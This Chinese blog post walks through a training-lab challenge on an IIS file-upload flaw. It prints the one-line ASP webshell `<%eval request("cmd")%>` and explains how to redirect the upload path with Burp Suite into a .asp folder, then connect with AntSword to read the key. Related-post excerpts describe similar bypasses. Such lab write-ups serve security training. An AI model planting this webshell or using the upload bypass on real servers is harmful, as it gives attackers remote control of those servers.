内部文件上传系统漏洞分析溯源

最新推荐文章于 2024-03-09 17:46:20 发布
最新推荐文章于 2024-03-09 17:46:20 发布
阅读量211 收藏 1
点赞数
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elg5127/article/details/125963012
版权
本文探讨了Web应用中的文件上传过程,包括上传限制与漏洞利用。提到了ASP错误代码ASP0104:80004005,并讨论了如何利用.asp文件进行代码注入,如使用一句话木马。还介绍了Burpsuite在安全测试中的应用,文件夹包含漏洞的利用,以及蚁剑(AntiShell)在数据添加和信息获取中的角色。
摘要由CSDN通过智能技术生成

1.有上传文件的地方
在这里插入图片描述
2.上传一个大小为245kb的jpg文件
在这里插入图片描述
3.查询“ASP 0104 : 80004005”
在这里插入图片描述
4.上传.asp后缀的文件
在这里插入图片描述
5.编写一句话木马

<%eval request ("cmd")%>

文件名:xxx.txt或者xxx.jpg等等

在这里插入图片描述
6.打开burp suite
在这里插入图片描述
7.点击网页“确定”按钮
8.然后出现的界面
在这里插入图片描述
9.修改文件夹包含.asp(叫什么都行,1.asp或者upload/2.asp都可以)
在这里插入图片描述

10.点击“forward”
在这里插入图片描述
11.使用蚁剑添加数据
在这里插入图片描述
12.点击wwwroot,点击KTY… .asp,获得key
在这里插入图片描述

Dem1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
[靶场练习]内部文件上传系统漏洞分析溯源
qq_24481913的博客
08-02 234
文件上传漏洞是web安全中经常用到的一种漏洞形式。是对数据与代码分离原则的一种攻击。上传漏洞顾名思义,就是攻击者上传了一个可执行文件如木马,病毒,恶意脚本,WebShell等到服务器执行,并最终获得网站控制权限的高危漏洞。
文件上传漏洞 —— 内部文件上传系统漏洞分析溯源
vergilben的学习日记
04-11 1871
文件上传漏洞 —— 内部文件上传系统漏洞分析溯源 这篇主要复现墨者学院的一个内部文件上传漏洞,内部文件上传系统漏洞分析溯源,还有另一题会写到另一篇里面。 关于文件上传漏洞,前面我的博客里面有写原理以及简单的实现,再写一下其原理。 文件上传漏洞原理:大部分的网站和应用系统都有上传功能,如用户头像上传、图片上传、文档上传等。一些文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻...
墨者——内部文件上传系统漏洞分析溯源 内部文件上传系统漏洞分析溯源
m_de_g的博客
02-24 1075
7.经过测试发现不行,那么查看一下操作系统的版本Microsoft-IIS/6.0。6.有个问题就是服务器将我们所上传的文件进行了重命名,故我们应该想办法截断。8.看看此服务器有没有什么漏洞,发现此版本有文件解析漏洞。,那么此目录下的所有文件就会被当做asp执行。:使用菜刀连接,一开始我还以为马儿有问题。9.把文档中的内容替换成一句话木马。12.接下来,使用菜刀连接。5.上传报错,将其改名为。1.选择合适的文件上传。3.可以推测出此站点为。11.改上传的路径为。
墨者学院06 内部文件上传系统漏洞分析溯源
weixin_42789937的博客
01-28 443
墨者学院06 内部文件上传系统漏洞分析溯源~友情提示:这道题目我用蚁剑连接失败了,原因不知...所以有可能不是靠谱的WP...
PHP魔众一物一码溯源防伪系统 v2.0.0
10-21
2. **部署程序**:将压缩包解压后,将`wwwroot`目录下的所有文件上传至服务器的Web根目录。 3. **配置数据库**:根据`install.html`指引,配置系统的数据库连接信息,包括数据库地址、用户名、密码和数据库名。 4....
农产品溯源系统设计方案.pdf
04-06
农产品溯源系统设计方案旨在构建一个全面、安全且高效的农产品流通信息服务平台,通过集成现代信息技术,如移动互联网、二维码和智能数据交换,实现农产品从生产到销售的全程追踪,以提升农产品的质量安全,增强消费...
溯源取证-流量分析 中级难度的资源
05-30
【标签】:“溯源取证-流量分析资源包”表明了这个压缩包包含的相关工具和数据,主要聚焦于通过流量分析来追查网络事件的来源,以及如何利用各种日志文件进行证据收集。 【文件详解】: 1. **Zui-Setup-1.0.1.exe*...
墨者学院 内部文件上传系统漏洞分析溯源
人若无名,便可专心练剑
11-06 148
【代码】墨者学院 内部文件上传系统漏洞分析溯源
一文爽 文件上传漏洞原理、方法和类型详细解析
MachineGunJoe666
05-23 1649
文件上传漏洞是web系统中常见的一种功能,通过文件上传能实现上传图片、视频,以及其他类型的文件,但是随着web中包含的功能越来越多,潜在的网络安全风险也就越大。如果恶意用户上传了可执行的文件或者脚本,就会导致网站被其控制甚至会使其服务器沦陷,以至于引发恶意的网络安全事件。
内部文件上传系统漏洞分析溯源(墨者学院)
m0_67352890的博客
10-27 394
内部文件上传系统漏洞分析溯源(墨者学院)
Web安全—文件上传(解析)漏洞
zhdf160916的博客
11-21 6211
教学目标 理解文件上传漏洞原理 掌握几种文件上传绕过方法 一、文件上传漏洞介绍 文件上传文件上传是现代互联网常见的功能,允许用户上传图片、视频、及其他类型文件,向用户提供的功能越多,web受攻击的风险就越大。 1、文件上传漏洞 上传文件时,如果未对上传的文件进行严格的验证和过滤,就容易造成文件上传漏洞,上传脚本文件(asp、aspx、php、jsp等) 注:asp,aspx对应iis解析 php对应apache解析 jsp对应java(tomcat) 恶意上传行为可能导致网站甚至整个服务器被控制。恶
360众测靶场题库之45-内部文件上传系统漏洞分析溯源
最新发布
zjl12344的博客
03-09 238
360众测靶场题库
墨者学院 - WebShell文件上传漏洞分析溯源(第5题)
多崎巡礼的博客
08-14 1727
弱口令 admin admin 进入后台 添加文章-上传asp一句话木马的图片马,记住返回的路径 当前数据库路径更改为上传一句话木马后返回的路径 备份数据库名称填写后缀为asp的文件名 菜刀链接即可   不能理解为什么数据库名是路径到文件,按理说应该是一个只到文件夹的路径才对。。。 言而总之,就是备份数据可以将文件重命名          ...
墨者学院 - 内部文件上传系统漏洞分析溯源
多崎巡礼的博客
07-26 2128
有意思有意思,搜索了半天还是不懂怎么创建文件夹,老老实实看了解题思路柳暗花明 burp还有这种操作,学到了不亏不亏 上传默认是upload 利用burp截包,更改(没有则自动创建)上传文件夹 此处更改为test.asp (iis6.0漏洞: 例如文件的名字为“*.asp;xxx.jpg”,会被 IIS 当作 asp 文件来解析并执行,原因是这样的: 首先我们请求 /aaa.asp;xxx.jpg...
0x0B.内部文件上传系统漏洞分析溯源
qq_31679787的博客
09-21 154
经过测试,服务器为IIS,且上传后的文件会被重命名,但是能够修改上传路径; 上传asp一句话木马,使用bp抓包,修改文件上传路径以及文件后缀名; 上传成功并且能够解析; 使用菜刀连接; 在目录中找到key文件; ...
【Web】内部文件上传系统漏洞分析溯源(获取shell)
HAPPY
07-29 3538
【准备工具】 1.中国菜刀 (可以去官网下载) 官网:http://www.maicaidao.co/ (不建议使用) https://download.csdn.net/download/u014549283/10570976 2.BurpPro 3.火狐浏览器的FoxyProxy Standard插件 【技术要点】 1.新建一句话代码,比如1.txt,内容选择如下 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值